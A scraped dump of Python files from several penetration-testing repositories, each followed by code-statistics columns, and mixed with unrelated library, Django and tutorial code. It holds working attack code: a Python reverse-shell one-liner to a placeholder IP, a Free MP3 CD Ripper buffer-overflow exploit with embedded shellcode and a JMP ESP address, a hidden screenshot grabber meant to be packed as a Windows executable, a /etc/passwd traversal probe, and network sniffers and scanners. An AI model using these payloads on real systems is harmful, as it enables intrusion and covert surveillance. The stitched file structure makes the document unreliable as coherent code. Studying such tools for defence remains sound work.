Penetration-Testing-Study-Notes | # Reverse shell one-liner python
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<IP>",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
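# Start a listener on the attacking host first (assumed), e.g. with netcat: nc -lvnp 1234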
| 63 | 220 | 0.686275 |
cybersecurity-penetration-testing | #!/usr/bin/python
# -*- coding: utf-8 -*-
from scapy.all import *
interface = 'mon0'
probeReqs = []
def sniffProbe(p):
if p.haslayer(Dot11ProbeReq):
netName = p.getlayer(Dot11ProbeReq).info
if netName not in probeReqs:
probeReqs.append(netName)
print '[+] Detected New Probe Request: ' + netName
sniff(iface=interface, prn=sniffProbe)
| 19.315789 | 62 | 0.636364 |
cybersecurity-penetration-testing | import os
import collections
import platform
import socket, subprocess,sys
import threading
from datetime import datetime
''' section 1 '''
net = raw_input("Enter the Network Address ")
net1= net.split('.')
a = '.'
net2 = net1[0]+a+net1[1]+a+net1[2]+a
st1 = int(raw_input("Enter the Starting Number "))
en1 = int(raw_input("Enter the Last Number "))
en1 =en1+1
dic = collections.OrderedDict()
#dic = collections.OrderedDict()
oper = platform.system()
if (oper=="Windows"):
ping1 = "ping -n 1 "
elif (oper== "Linux"):
ping1 = "ping -c 1 "
else :
ping1 = "ping -c 1 "
t1= datetime.now()
'''section 2'''
class myThread (threading.Thread):
def __init__(self,st,en):
threading.Thread.__init__(self)
self.st = st
self.en = en
def run(self):
run1(self.st,self.en)
'''section 3'''
def run1(st1,en1):
#print "Scanning in Progess"
for ip in xrange(st1,en1):
#print ".",
addr = net2+str(ip)
comm = ping1+addr
response = os.popen(comm)
for line in response.readlines():
if(line.count("TTL")):
break
if (line.count("TTL")):
#print addr, "--> Live"
dic[ip]= addr
''' Section 4 '''
total_ip =en1-st1
tn =20 # number of ip handled by one thread
total_thread = total_ip/tn
total_thread=total_thread+1
threads= []
try:
for i in xrange(total_thread):
en = st1+tn
if(en >en1):
en =en1
thread = myThread(st1,en)
thread.start()
threads.append(thread)
st1 =en
except:
print "Error: unable to start thread"
print "\tNumber of Threads active:", threading.activeCount()
for t in threads:
t.join()
print "Exiting Main Thread"
dict = collections.OrderedDict(sorted(dic.items()))
for key in dict:
print dict[key],"-->" "Live"
t2= datetime.now()
total =t2-t1
print "scanning complete in " , total | 21.934211 | 60 | 0.660735 |
Penetration_Testing |
'''
Suggestion:
Use py2exe to turn this script into a Windows executable.
Example: python setup.py py2exe
Run as administrator to store file under current path.
Change pathname if administrator level privilege is not possible.
Ways to improve program:
* Compress files to reduce size.
'''
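
# Minimal py2exe build script referenced above (a sketch; the filename
# 'screenshot_taker.py' is assumed -- substitute this module's real name):
#
#   from distutils.core import setup
#   import py2exe
#   setup(console=['screenshot_taker.py'])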
import win32gui
import win32ui
import win32con
import win32api
import time
import itertools
def win_screenshot_taker():
while True:
for i in itertools.count():
# Grab a handle to the main desktop window
fg_window = win32gui.GetDesktopWindow()
# Determine the size of all monitors in pixels
width = win32api.GetSystemMetrics(win32con.SM_CXVIRTUALSCREEN)
height = win32api.GetSystemMetrics(win32con.SM_CYVIRTUALSCREEN)
left = win32api.GetSystemMetrics(win32con.SM_XVIRTUALSCREEN)
top = win32api.GetSystemMetrics(win32con.SM_YVIRTUALSCREEN)
# Create a device context
desktop_dc = win32gui.GetWindowDC(fg_window)
img_dc = win32ui.CreateDCFromHandle(desktop_dc)
# Create a memory-based device context
mem_dc = img_dc.CreateCompatibleDC()
# Create a bitmap object
screenshot = win32ui.CreateBitmap()
screenshot.CreateCompatibleBitmap(img_dc, width, height)
mem_dc.SelectObject(screenshot)
# Copy the screen into our memory device context
mem_dc.BitBlt((0, 0), (width, height), img_dc, (left, top), win32con.SRCCOPY)
# Save the bitmap to a file
screenshot.SaveBitmapFile(mem_dc, "c:\\WINDOWS\\Temp\\screenshot{}.bmp".format(i))
# Free our objects
mem_dc.DeleteDC()
win32gui.DeleteObject(screenshot.GetHandle())
time.sleep(3)
win_screenshot_taker()
| 25.193548 | 85 | 0.748614 |
owtf | """
ACTIVE Plugin for Testing for Web Application Fingerprint (OWASP-IG-004)
https://www.owasp.org/index.php/Testing_for_Web_Application_Fingerprint_%28OWASP-IG-004%29
"""
from owtf.managers.resource import get_resources
from owtf.plugin.helper import plugin_helper
DESCRIPTION = "Active probing for fingerprint analysis"
def run(PluginInfo):
resource = get_resources("ActiveFingerPrint")
Content = plugin_helper.CommandDump(
"Test Command", "Output", resource, PluginInfo, []
) # No previous output
return Content
| 31 | 90 | 0.747698 |
cybersecurity-penetration-testing | # Prime Number Sieve
# http://inventwithpython.com/hacking (BSD Licensed)
import math
def isPrime(num):
# Returns True if num is a prime number, otherwise False.
# Note: Generally, isPrime() is slower than primeSieve().
# all numbers less than 2 are not prime
if num < 2:
return False
# see if num is divisible by any number up to the square root of num
for i in range(2, int(math.sqrt(num)) + 1):
if num % i == 0:
return False
return True
def primeSieve(sieveSize):
# Returns a list of prime numbers calculated using
# the Sieve of Eratosthenes algorithm.
sieve = [True] * sieveSize
sieve[0] = False # zero and one are not prime numbers
sieve[1] = False
# create the sieve
for i in range(2, int(math.sqrt(sieveSize)) + 1):
pointer = i * 2
while pointer < sieveSize:
sieve[pointer] = False
pointer += i
# compile the list of primes
primes = []
for i in range(sieveSize):
if sieve[i] == True:
primes.append(i)
return primes
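
# Quick demonstration (a sketch, not part of the original module):
if __name__ == '__main__':
    print(primeSieve(30))                          # [2, 3, 5, 7, 11, 13, 17, 19, 23, 29]
    print([n for n in range(30) if isPrime(n)])    # the same list, via trial division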
| 24.333333 | 73 | 0.587357 |
cybersecurity-penetration-testing | import socket
import struct
from datetime import datetime
s = socket.socket(socket.PF_PACKET, socket.SOCK_RAW, 8)
dict = {}
file_txt = open("dos.txt",'a')
file_txt.writelines("**********")
t1= str(datetime.now())
file_txt.writelines(t1)
file_txt.writelines("**********")
file_txt.writelines("\n")
print "Detection Start ......."
# Flag an IP once it has sent more than D_val packets; stop logging it again
# beyond D_val1 so a single noisy source does not flood the log file
D_val = 10
D_val1 = D_val + 10
while True:
pkt = s.recvfrom(2048)
ipheader = pkt[0][14:34]
ip_hdr = struct.unpack("!8sB3s4s4s",ipheader)
IP = socket.inet_ntoa(ip_hdr[3])
print "Source IP", IP
if dict.has_key(IP):
dict[IP]=dict[IP]+1
print dict[IP]
if(dict[IP]>D_val) and (dict[IP]<D_val1) :
line = "DDOS Detected "
file_txt.writelines(line)
file_txt.writelines(IP)
file_txt.writelines("\n")
else:
dict[IP]=1
| 18.65 | 55 | 0.633121 |
PenetrationTestingScripts | # Copyright Jonathan Hartley 2013. BSD 3-Clause license, see LICENSE file.
import re
import sys
import os
from .ansi import AnsiFore, AnsiBack, AnsiStyle, Style
from .winterm import WinTerm, WinColor, WinStyle
from .win32 import windll, winapi_test
winterm = None
if windll is not None:
winterm = WinTerm()
def is_stream_closed(stream):
return not hasattr(stream, 'closed') or stream.closed
def is_a_tty(stream):
return hasattr(stream, 'isatty') and stream.isatty()
class StreamWrapper(object):
'''
Wraps a stream (such as stdout), acting as a transparent proxy for all
attribute access apart from method 'write()', which is delegated to our
Converter instance.
'''
def __init__(self, wrapped, converter):
# double-underscore everything to prevent clashes with names of
# attributes on the wrapped stream object.
self.__wrapped = wrapped
self.__convertor = converter
def __getattr__(self, name):
return getattr(self.__wrapped, name)
def write(self, text):
self.__convertor.write(text)
class AnsiToWin32(object):
'''
Implements a 'write()' method which, on Windows, will strip ANSI character
sequences from the text, and if outputting to a tty, will convert them into
win32 function calls.
'''
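    # Typical wiring (a sketch of how a caller such as colorama's init() is
    # expected to use this class):
    #   wrapper = AnsiToWin32(sys.stdout)
    #   if wrapper.should_wrap():
    #       sys.stdout = wrapper.stream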
ANSI_CSI_RE = re.compile('\001?\033\[((?:\d|;)*)([a-zA-Z])\002?') # Control Sequence Introducer
ANSI_OSC_RE = re.compile('\001?\033\]((?:.|;)*?)(\x07)\002?') # Operating System Command
def __init__(self, wrapped, convert=None, strip=None, autoreset=False):
# The wrapped stream (normally sys.stdout or sys.stderr)
self.wrapped = wrapped
# should we reset colors to defaults after every .write()
self.autoreset = autoreset
# create the proxy wrapping our output stream
self.stream = StreamWrapper(wrapped, self)
on_windows = os.name == 'nt'
# We test if the WinAPI works, because even if we are on Windows
# we may be using a terminal that doesn't support the WinAPI
# (e.g. Cygwin Terminal). In this case it's up to the terminal
# to support the ANSI codes.
conversion_supported = on_windows and winapi_test()
# should we strip ANSI sequences from our output?
if strip is None:
strip = conversion_supported or (not is_stream_closed(wrapped) and not is_a_tty(wrapped))
self.strip = strip
# should we should convert ANSI sequences into win32 calls?
if convert is None:
convert = conversion_supported and not is_stream_closed(wrapped) and is_a_tty(wrapped)
self.convert = convert
# dict of ansi codes to win32 functions and parameters
self.win32_calls = self.get_win32_calls()
# are we wrapping stderr?
self.on_stderr = self.wrapped is sys.stderr
def should_wrap(self):
'''
True if this class is actually needed. If false, then the output
stream will not be affected, nor will win32 calls be issued, so
wrapping stdout is not actually required. This will generally be
False on non-Windows platforms, unless optional functionality like
autoreset has been requested using kwargs to init()
'''
return self.convert or self.strip or self.autoreset
def get_win32_calls(self):
if self.convert and winterm:
return {
AnsiStyle.RESET_ALL: (winterm.reset_all, ),
AnsiStyle.BRIGHT: (winterm.style, WinStyle.BRIGHT),
AnsiStyle.DIM: (winterm.style, WinStyle.NORMAL),
AnsiStyle.NORMAL: (winterm.style, WinStyle.NORMAL),
AnsiFore.BLACK: (winterm.fore, WinColor.BLACK),
AnsiFore.RED: (winterm.fore, WinColor.RED),
AnsiFore.GREEN: (winterm.fore, WinColor.GREEN),
AnsiFore.YELLOW: (winterm.fore, WinColor.YELLOW),
AnsiFore.BLUE: (winterm.fore, WinColor.BLUE),
AnsiFore.MAGENTA: (winterm.fore, WinColor.MAGENTA),
AnsiFore.CYAN: (winterm.fore, WinColor.CYAN),
AnsiFore.WHITE: (winterm.fore, WinColor.GREY),
AnsiFore.RESET: (winterm.fore, ),
AnsiFore.LIGHTBLACK_EX: (winterm.fore, WinColor.BLACK, True),
AnsiFore.LIGHTRED_EX: (winterm.fore, WinColor.RED, True),
AnsiFore.LIGHTGREEN_EX: (winterm.fore, WinColor.GREEN, True),
AnsiFore.LIGHTYELLOW_EX: (winterm.fore, WinColor.YELLOW, True),
AnsiFore.LIGHTBLUE_EX: (winterm.fore, WinColor.BLUE, True),
AnsiFore.LIGHTMAGENTA_EX: (winterm.fore, WinColor.MAGENTA, True),
AnsiFore.LIGHTCYAN_EX: (winterm.fore, WinColor.CYAN, True),
AnsiFore.LIGHTWHITE_EX: (winterm.fore, WinColor.GREY, True),
AnsiBack.BLACK: (winterm.back, WinColor.BLACK),
AnsiBack.RED: (winterm.back, WinColor.RED),
AnsiBack.GREEN: (winterm.back, WinColor.GREEN),
AnsiBack.YELLOW: (winterm.back, WinColor.YELLOW),
AnsiBack.BLUE: (winterm.back, WinColor.BLUE),
AnsiBack.MAGENTA: (winterm.back, WinColor.MAGENTA),
AnsiBack.CYAN: (winterm.back, WinColor.CYAN),
AnsiBack.WHITE: (winterm.back, WinColor.GREY),
AnsiBack.RESET: (winterm.back, ),
AnsiBack.LIGHTBLACK_EX: (winterm.back, WinColor.BLACK, True),
AnsiBack.LIGHTRED_EX: (winterm.back, WinColor.RED, True),
AnsiBack.LIGHTGREEN_EX: (winterm.back, WinColor.GREEN, True),
AnsiBack.LIGHTYELLOW_EX: (winterm.back, WinColor.YELLOW, True),
AnsiBack.LIGHTBLUE_EX: (winterm.back, WinColor.BLUE, True),
AnsiBack.LIGHTMAGENTA_EX: (winterm.back, WinColor.MAGENTA, True),
AnsiBack.LIGHTCYAN_EX: (winterm.back, WinColor.CYAN, True),
AnsiBack.LIGHTWHITE_EX: (winterm.back, WinColor.GREY, True),
}
return dict()
def write(self, text):
if self.strip or self.convert:
self.write_and_convert(text)
else:
self.wrapped.write(text)
self.wrapped.flush()
if self.autoreset:
self.reset_all()
def reset_all(self):
if self.convert:
self.call_win32('m', (0,))
elif not self.strip and not is_stream_closed(self.wrapped):
self.wrapped.write(Style.RESET_ALL)
def write_and_convert(self, text):
'''
Write the given text to our wrapped stream, stripping any ANSI
sequences from the text, and optionally converting them into win32
calls.
'''
cursor = 0
text = self.convert_osc(text)
for match in self.ANSI_CSI_RE.finditer(text):
start, end = match.span()
self.write_plain_text(text, cursor, start)
self.convert_ansi(*match.groups())
cursor = end
self.write_plain_text(text, cursor, len(text))
def write_plain_text(self, text, start, end):
if start < end:
self.wrapped.write(text[start:end])
self.wrapped.flush()
def convert_ansi(self, paramstring, command):
if self.convert:
params = self.extract_params(command, paramstring)
self.call_win32(command, params)
def extract_params(self, command, paramstring):
if command in 'Hf':
params = tuple(int(p) if len(p) != 0 else 1 for p in paramstring.split(';'))
while len(params) < 2:
# defaults:
params = params + (1,)
else:
params = tuple(int(p) for p in paramstring.split(';') if len(p) != 0)
if len(params) == 0:
# defaults:
if command in 'JKm':
params = (0,)
elif command in 'ABCD':
params = (1,)
return params
def call_win32(self, command, params):
if command == 'm':
for param in params:
if param in self.win32_calls:
func_args = self.win32_calls[param]
func = func_args[0]
args = func_args[1:]
kwargs = dict(on_stderr=self.on_stderr)
func(*args, **kwargs)
elif command in 'J':
winterm.erase_screen(params[0], on_stderr=self.on_stderr)
elif command in 'K':
winterm.erase_line(params[0], on_stderr=self.on_stderr)
elif command in 'Hf': # cursor position - absolute
winterm.set_cursor_position(params, on_stderr=self.on_stderr)
elif command in 'ABCD': # cursor position - relative
n = params[0]
# A - up, B - down, C - forward, D - back
x, y = {'A': (0, -n), 'B': (0, n), 'C': (n, 0), 'D': (-n, 0)}[command]
winterm.cursor_adjust(x, y, on_stderr=self.on_stderr)
def convert_osc(self, text):
for match in self.ANSI_OSC_RE.finditer(text):
start, end = match.span()
text = text[:start] + text[end:]
paramstring, command = match.groups()
if command in '\x07': # \x07 = BEL
params = paramstring.split(";")
# 0 - change title and icon (we will only change title)
# 1 - change icon (we don't support this)
# 2 - change title
if params[0] in '02':
winterm.set_title(params[1])
return text
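# Illustrative usage sketch (an assumption added for documentation only; the
# library normally performs this wrapping for you via colorama.init()):
#
#   import sys
#   wrapper = AnsiToWin32(sys.stdout, autoreset=True)
#   if wrapper.should_wrap():
#       wrapper.stream.write('\033[31mred, even on a Windows console\033[0m\n')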
| 39.797468 | 103 | 0.584816 |
Hands-On-Penetration-Testing-with-Python | #! /usr/bin/python3.5
def method_1(*args):
print("------------------------")
print("Method_1 -")
print("Recievied : " +str(args))
sum=0
for arg in args:
sum=sum+arg
print ("Sum : " +str(sum))
print("------------------------\n")
def method_1_rev(a=0,b=0,c=0,d=0):
print("------------------------")
print("Method_1_rev")
sum= a + b + c + d
print ("Sum : " +str(sum))
print("------------------------\n")
def method_2(**args):
print("------------------------")
print("Method 2")
print("Recievied : " +str(args))
for k,v in args.items():
print("Key : " +str(k) +",\
Value : "+str(v))
print("------------------------\n")
def method_2_rev(k1="first key",k2="second key"):
print("------------------------")
print("Methid_2_rev")
print("Value for K1 : "+str(k1))
print("Value for K2 : "+str(k2))
print("------------------------\n")
def execute_all():
method_1(1,2,3,4,5,6,7,8)
method_2(k1=22,k2=33)
my_list=[1,2,3,4]
my_dict={"k1":"Value 1","k2":"Value 2"}
method_1_rev(*my_list)
method_2_rev(**my_dict)
execute_all()
| 24.512195 | 49 | 0.469856 |
cybersecurity-penetration-testing | #!/usr/bin/env python
'''
Author: Chris Duffy
Date: May 2015
Name: banner_grabber.py
Purpose: To provide a means to demonstrate a simple file upload proof of concept related to
exploiting Free MP3 CD Ripper.
Copyright (c) 2015, Christopher Duffy All rights reserved.
Redistribution and use in source and binary forms, with or without modification,
are permitted provided that the following conditions are met: * Redistributions
of source code must retain the above copyright notice, this list of conditions and
the following disclaimer. * Redistributions in binary form must reproduce the above
copyright notice, this list of conditions and the following disclaimer in the
documentation and/or other materials provided with the distribution. * Neither the
name of the nor the names of its contributors may be used to endorse or promote
products derived from this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
"AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL CHRISTOPHER DUFFY BE LIABLE FOR ANY DIRECT, INDIRECT,
INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
'''
import struct
filename="exploit.wav"
fill ="A"*4112
#eip = struct.pack('<I',0x42424242) # EIP overwrite verification
eip = struct.pack('<I',0x7C874413) # JMP ESP instruction from Kernel32.dll
offset = "\x90"*10
available_shellcode_space = 320
# Place for calc.exe shellcode
calc = ("\xba\x86\x2c\x9a\x7b\xd9\xc2\xd9\x74\x24\xf4\x5e\x33\xc9\xb1"
"\x31\x83\xc6\x04\x31\x56\x0f\x03\x56\x89\xce\x6f\x87\x7d\x8c"
"\x90\x78\x7d\xf1\x19\x9d\x4c\x31\x7d\xd5\xfe\x81\xf5\xbb\xf2"
"\x6a\x5b\x28\x81\x1f\x74\x5f\x22\x95\xa2\x6e\xb3\x86\x97\xf1"
"\x37\xd5\xcb\xd1\x06\x16\x1e\x13\x4f\x4b\xd3\x41\x18\x07\x46"
"\x76\x2d\x5d\x5b\xfd\x7d\x73\xdb\xe2\x35\x72\xca\xb4\x4e\x2d"
"\xcc\x37\x83\x45\x45\x20\xc0\x60\x1f\xdb\x32\x1e\x9e\x0d\x0b"
"\xdf\x0d\x70\xa4\x12\x4f\xb4\x02\xcd\x3a\xcc\x71\x70\x3d\x0b"
"\x08\xae\xc8\x88\xaa\x25\x6a\x75\x4b\xe9\xed\xfe\x47\x46\x79"
"\x58\x4b\x59\xae\xd2\x77\xd2\x51\x35\xfe\xa0\x75\x91\x5b\x72"
"\x17\x80\x01\xd5\x28\xd2\xea\x8a\x8c\x98\x06\xde\xbc\xc2\x4c"
"\x21\x32\x79\x22\x21\x4c\x82\x12\x4a\x7d\x09\xfd\x0d\x82\xd8"
"\xba\xe2\xc8\x41\xea\x6a\x95\x13\xaf\xf6\x26\xce\xf3\x0e\xa5"
"\xfb\x8b\xf4\xb5\x89\x8e\xb1\x71\x61\xe2\xaa\x17\x85\x51\xca"
"\x3d\xe6\x34\x58\xdd\xc7\xd3\xd8\x44\x18")
# Place for actual shellcode
shell = ""  # placeholder for real shellcode (kept as a string so the loaders below concatenate cleanly)
#nop = "\x90"*(available_shellcode_space-len(shell)-len(offset))
#exploit = fill + eip + offset + shell + nop
exploit = fill + eip + offset + calc # loader for simple proof of concept for shell code
#exploit = fill + eip + offset + shell #loader for real shell access
open('exploit.wav', 'w').close()
writeFile = open (filename, "w")
writeFile.write(exploit)
writeFile.close()
| 50.671875 | 91 | 0.757411 |
PenetrationTestingScripts | # -*- coding: utf-8 -*-
# Generated by Django 1.9.1 on 2016-01-08 06:50
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('nmaper', '0009_auto_20160108_0613'),
]
operations = [
migrations.AlterField(
model_name='nmapscan',
name='email_text',
field=models.CharField(max_length=8),
),
migrations.AlterField(
model_name='nmapscan',
name='status_text',
field=models.CharField(choices=[('waiting', 'Waiting'), ('running', 'Running'), ('finished', 'Finished')], max_length=16),
),
]
| 25.884615 | 134 | 0.577364 |
cybersecurity-penetration-testing | import requests
import sys
url = "http://127.0.0.1/traversal/third.php?id="
payloads = {'etc/passwd': 'root'}
up = "../"
i = 0
for payload, string in payloads.iteritems():
while i < 7:
req = requests.post(url+(i*up)+payload)
if string in req.text:
print "Parameter vulnerable\r\n"
print "Attack string: "+(i*up)+payload+"\r\n"
print req.text
break
i = i+1
i = 0
| 21.529412 | 48 | 0.638743 |
Effective-Python-Penetration-Testing | import urllib
url = urllib.urlopen("http://packtpub.com/")
data = url.read()
print data
| 17.6 | 45 | 0.684783 |
cybersecurity-penetration-testing | #!/usr/bin/python
#
# Padding Oracle test-cases generator.
# Mariusz Banach / mgeeky, 2016
# v0.2
#
# Simple utility that aids the penetration tester when manually testing Padding Oracle condition
# of a target cryptosystem, by generating a set of test cases to feed the cryptosystem with.
#
# Script that takes an encoded cipher text as input, tries to detect the applied encoding, decodes the cipher
# and then generates all the possible, reasonable cipher text transformations to be used while manually
# testing for Padding Oracle condition of cryptosystem. The output of this script will be hundreds of
# encoded values to be used in manual application testing approaches, like sending requests.
#
# One of possible scenarios and ways to use the below script could be the following:
# - clone the following repo: https://github.com/GDSSecurity/PaddingOracleDemos
# - launch pador.py which is an example of application vulnerable to Padding Oracle
# - then by using `curl http://localhost:5000/echo?cipher=<ciphertext>` we are going to manually
# test for Padding Oracle outcomes. The case of returning something not being a 'decryption error'
# result would be considered padding-hit, therefore vulnerability proof.
#
# This script could be then launched to generate every possible test case of second to the last block
# being filled with specially tailored values (like vector of zeros with last byte ranging from 0-255)
# and then used in some kind of local http proxy (burp/zap) or http client like (curl/wget).
#
# Such example usage look like:
#
#---------------------------------------------
# bash$ x=0 ; for i in $(./padding-oracle-tests.py 484b850123a04baf15df9be14e87369bc59ca16e1f3645ef53cc6a4d9d87308ed2382fb0a54f3a2954bfebe0a04dd4d6); \
# do curl -s http://host:5000/echo?cipher=$i | grep -qv 'error' && printf "Byte: 0x%02x not generated decryption error.\n" $x ; x=$((x+1)); done
#
# [?] Data resembles block cipher with block size = 16
# [?] Data resembles block cipher with block size = 8
#
# Generated in total: 512 test cases for 8, 16 block sizes.
# Byte: 0x87 not generated decryption error.
#---------------------------------------------
#
# There the script took at it's first parameter the hex encoded parameter, used it to feed test cases generator and resulted with 512
# test cases varying with the last byte of the second to the last block:
# (...)
# 484b850123a04baf15df9be14e87369b000000000000000000000000000000fad2382fb0a54f3a2954bfebe0a04dd4d6
# 484b850123a04baf15df9be14e87369b000000000000000000000000000000fbd2382fb0a54f3a2954bfebe0a04dd4d6
# 484b850123a04baf15df9be14e87369b000000000000000000000000000000fcd2382fb0a54f3a2954bfebe0a04dd4d6
# 484b850123a04baf15df9be14e87369b000000000000000000000000000000fdd2382fb0a54f3a2954bfebe0a04dd4d6
# 484b850123a04baf15df9be14e87369b000000000000000000000000000000fed2382fb0a54f3a2954bfebe0a04dd4d6
# 484b850123a04baf15df9be14e87369b000000000000000000000000000000ffd2382fb0a54f3a2954bfebe0a04dd4d6
# 484b850123a04baf15df9be14e87369bc59ca16e1f3645ef53cc6a4d9d87308e000000000000000054bfebe0a04dd4d6
# 484b850123a04baf15df9be14e87369bc59ca16e1f3645ef53cc6a4d9d87308e000000000000000154bfebe0a04dd4d6
# 484b850123a04baf15df9be14e87369bc59ca16e1f3645ef53cc6a4d9d87308e000000000000000254bfebe0a04dd4d6
# 484b850123a04baf15df9be14e87369bc59ca16e1f3645ef53cc6a4d9d87308e000000000000000354bfebe0a04dd4d6
# 484b850123a04baf15df9be14e87369bc59ca16e1f3645ef53cc6a4d9d87308e000000000000000454bfebe0a04dd4d6
# 484b850123a04baf15df9be14e87369bc59ca16e1f3645ef53cc6a4d9d87308e000000000000000554bfebe0a04dd4d6
# 484b850123a04baf15df9be14e87369bc59ca16e1f3645ef53cc6a4d9d87308e000000000000000654bfebe0a04dd4d6
# (...)
#
# At the end, those values were used in for loop to launch for every entry a curl client with request to the Padding Oracle.
# The 0x87 byte that was caught was the only one that did not generate a 'decryption error' outcome from the request, resulting
# in improperly decrypted plain-text from attacker-controlled cipher text.
#
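# A minimal Python sketch of the same probing loop as the curl one-liner above
# (assumptions: the http://localhost:5000/echo endpoint and the 'error' marker
# are specific to the pador.py demo; adapt both for a real target):
#
#   gen = PaddingOracleTestCasesGenerator(ciphertext_hex)  # hex-encoded cipher text
#   for idx, case in enumerate(gen.generate_test_cases()):
#       body = urllib.urlopen('http://localhost:5000/echo?cipher=' + case).read()
#       if 'error' not in body:
#           info('Case #%d did not produce a decryption error' % idx)
#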
import re
import sys
import urllib
import binascii as ba
import base64
# Flip this variable when your input data is not being properly processed.
DEBUG = False
def info(txt):
sys.stderr.write(txt + '\n')
def warning(txt):
info('[?] ' + txt)
def error(txt):
info('[!] ' + txt)
def dbg(txt):
if DEBUG:
info('[dbg] '+txt)
# or maybe:
# class PaddingOracleTestCasesWithVaryingSecondToTheLastBlockGenerator
class PaddingOracleTestCasesGenerator:
NONE = 0
B64URL = 1
B64STD = 2
HEXENC = 3
data = ''
offset = 0
encoding = NONE
blocksizes = set()
urlencoded = False
def __init__(self, data, blocksize=0):
self.data = data
len_before = len(data)
self.encoding = self.detect_encoding()
self.data = self.decode(data)
if blocksize != 0:
assert blocksize % 8 == 0, "Blocksize must be divisible by 8"
self.blocksizes = [blocksize,]
else:
self.detect_blocksize()
self.data_evaluation(len_before)
def data_evaluation(self, len_before):
def entropy(txt):
import math
from collections import Counter
p, lns = Counter(txt), float(len(txt))
return -sum( count / lns * math.log(count/lns, 2) for count in p.values())
e = entropy(self.data)
warning('Data size before and after decoding: %d -> %d' % (len_before, len(self.data)))
warning('Data entropy: %.6f' % entropy(self.data))
if e < 5.0:
            info('\tData does not look random; unlikely to be dealing with a block cipher.')
elif e >= 5.0 and e < 7.0:
            info('\tData only loosely resembles a random stream; unlikely to be dealing with a block cipher.')
else:
info('\tHigh likelihood of dealing with block cipher. That\'s good.')
if self.offset != 0:
warning('Data structure not resembles block cipher.')
warning('Proceeding with sliding window of %d bytes in the beginning and at the end\n' % self.offset)
else:
warning('Data resembles block cipher with block size = %d' % max(self.blocksizes))
def detect_encoding(self):
b64url = '^[a-zA-Z0-9_\-]+={0,2}$'
b64std = '^[a-zA-Z0-9\+\/]+={0,2}$'
hexenc1 = '^[0-9a-f]+$'
hexenc2 = '^[0-9A-F]+$'
data = self.data
if re.search('%[0-9a-f]{2}', self.data, re.I) != None:
dbg('Sample is url-encoded.')
data = urllib.unquote_plus(data)
self.urlencoded = True
if (re.match(hexenc1, data) or re.match(hexenc2, data)) and len(data) % 2 == 0:
dbg('Hex encoding detected.')
return self.HEXENC
if re.match(b64url, data):
dbg('Base64url encoding detected.')
return self.B64URL
if re.match(b64std, data):
dbg('Standard Base64 encoding detected.')
return self.B64STD
error('Warning: Could not detect data encoding. Going with plain data.')
return self.NONE
def detect_blocksize(self):
        sizes = [32, 16, 8] # Correspondingly: 256, 128, 64 bits
self.offset = len(self.data) % 8
datalen = len(self.data) - self.offset
for s in sizes:
if datalen % s == 0 and datalen / s >= 2:
self.blocksizes.add(s)
if not len(self.blocksizes):
if datalen >= 32:
self.blocksizes.add(16)
if datalen >= 16:
self.blocksizes.add(8)
if not len(self.blocksizes):
raise Exception("Could not detect data's blocksize automatically.")
def encode(self, data):
def _enc(data):
if self.encoding == PaddingOracleTestCasesGenerator.B64URL:
return base64.urlsafe_b64encode(data)
elif self.encoding == PaddingOracleTestCasesGenerator.B64STD:
return base64.b64encode(data)
elif self.encoding == PaddingOracleTestCasesGenerator.HEXENC:
return ba.hexlify(data).strip()
else:
return data
enc = _enc(data)
if self.urlencoded:
return urllib.quote_plus(enc)
else:
return enc
def decode(self, data):
def _decode(self, data):
if self.urlencoded:
data = urllib.unquote_plus(data)
if self.encoding == PaddingOracleTestCasesGenerator.B64URL:
return base64.urlsafe_b64decode(data)
elif self.encoding == PaddingOracleTestCasesGenerator.B64STD:
return base64.b64decode(data)
elif self.encoding == PaddingOracleTestCasesGenerator.HEXENC:
return ba.unhexlify(data).strip()
else:
return data
dbg("Hex dump of data before decoding:\n" + hex_dump(data))
decoded = _decode(self, data)
dbg("Hex dump of data after decoding:\n" + hex_dump(decoded))
return decoded
def construct_second_to_last_block(self, data, blocksize, value, offset=0):
assert len(data) >= 2 * blocksize, "Too short data to operate on it with given blocksize."
assert abs(offset) < blocksize, "Incorrect offset was specified. Out-of-bounds access."
# Null vector with the last byte set to iterated value.
block = '0' * (2*(blocksize-1)) + '%02x' % value
if offset >= 0:
# datadata<rest>
return data[:-2*blocksize-offset] + ba.unhexlify(block) + data[-blocksize-offset:]
else:
# <rest>datadata
return data[-offset:-2*blocksize] + ba.unhexlify(block) + data[-blocksize:]
def generate_test_cases(self):
cases = []
data = self.data
for size in self.blocksizes:
dbg("Now generating test cases of %d blocksize." % size)
for byte in range(256):
# No offset
cases.append(self.encode(self.construct_second_to_last_block(data, size, byte)))
if self.offset != 0:
cases.append(self.encode(self.construct_second_to_last_block(data, size, byte, self.offset)))
cases.append(self.encode(self.construct_second_to_last_block(data, size, byte, -self.offset)))
return cases
def hex_dump(data):
s = ''
n = 0
lines = []
if len(data) == 0:
return '<empty>'
for i in range(0, len(data), 16):
line = ''
line += '%04x | ' % (i)
n += 16
for j in range(n-16, n):
if j >= len(data): break
line += '%02x ' % ord(data[j])
line += ' ' * (3 * 16 + 7 - len(line)) + ' | '
for j in range(n-16, n):
if j >= len(data): break
c = data[j] if not (ord(data[j]) < 0x20 or ord(data[j]) > 0x7e) else '.'
line += '%c' % c
lines.append(line)
return '\n'.join(lines)
def main():
info('\n\tPadding Oracle test-cases generator')
info('\tMariusz Banach / mgeeky, 2016\n')
if len(sys.argv) < 2:
